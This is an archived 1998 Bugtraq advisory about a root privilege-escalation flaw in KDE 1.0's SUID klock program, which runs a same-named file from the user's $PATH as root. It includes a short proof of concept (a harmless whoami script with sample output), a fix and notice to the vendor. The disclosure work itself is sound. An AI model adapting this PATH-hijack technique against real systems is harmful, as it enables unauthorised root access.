Bugtraq mailing list archives
KDE 1.0's klock can be used to gain root privileges
From: hdmoore () USA NET (HD Moore)
Date: Mon, 16 Nov 1998 19:57:51 -0600
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

--( the problem )--

The SUID program klock shipped with KDE 1.0 attempts to execute
kblankscrn.kss in the same directory as itself. If kblankscrn.kss cannot be
executed (missing or mode -x), then klock will search the current user's
$PATH for any executable with the same name and execute it as ROOT. If no
executable is found in the current path it gives this message:

>Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin

Default modes for klock and kblankscrn.kss are:

-rwsr-xr-x 1 root root  8760 Mar 12  1998 /opt/kde/bin/klock
-rwsr-xr-x 1 root root 43600 Mar 12  1998 /opt/kde/bin/kblankscrn.kss

Systems Affected: any system that runs KDE 1.0

____________________________________________________

--( the exploit )--

This is only exploitable if any of the following occurs:

1) klock is moved to another directory
2) kblankscrn.kss is moved to another directory
3) kblankscrn.kss is not executable

To see if you are vulnerable...

1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script that looks like:

   #!/bin/sh
   echo Running script as `whoami`!
   exit

4) name this script kblankscrn.kss and mv it to your home directory.
5) execute /opt/kde/bin/klock; you should see:

   user@hostname:/home/user> /opt/kde/bin/klock
   user@hostname:/home/user> Running script as root!

6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss

____________________________________________________

--( the fix )--

chmod 700 /opt/kde/bin/klock, or wait until KDE is updated.

The KDE buglist has been notified.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw
UmLBRO0nACQcXreodKkWFrpm
=rKnX
-----END PGP SIGNATURE-----
Current thread:
- KDE 1.0's klock can be used to gain root privileges HD Moore (Nov 16)
- Re: KDE 1.0's klock can be used to gain root privileges Phillip Vandry (Nov 17)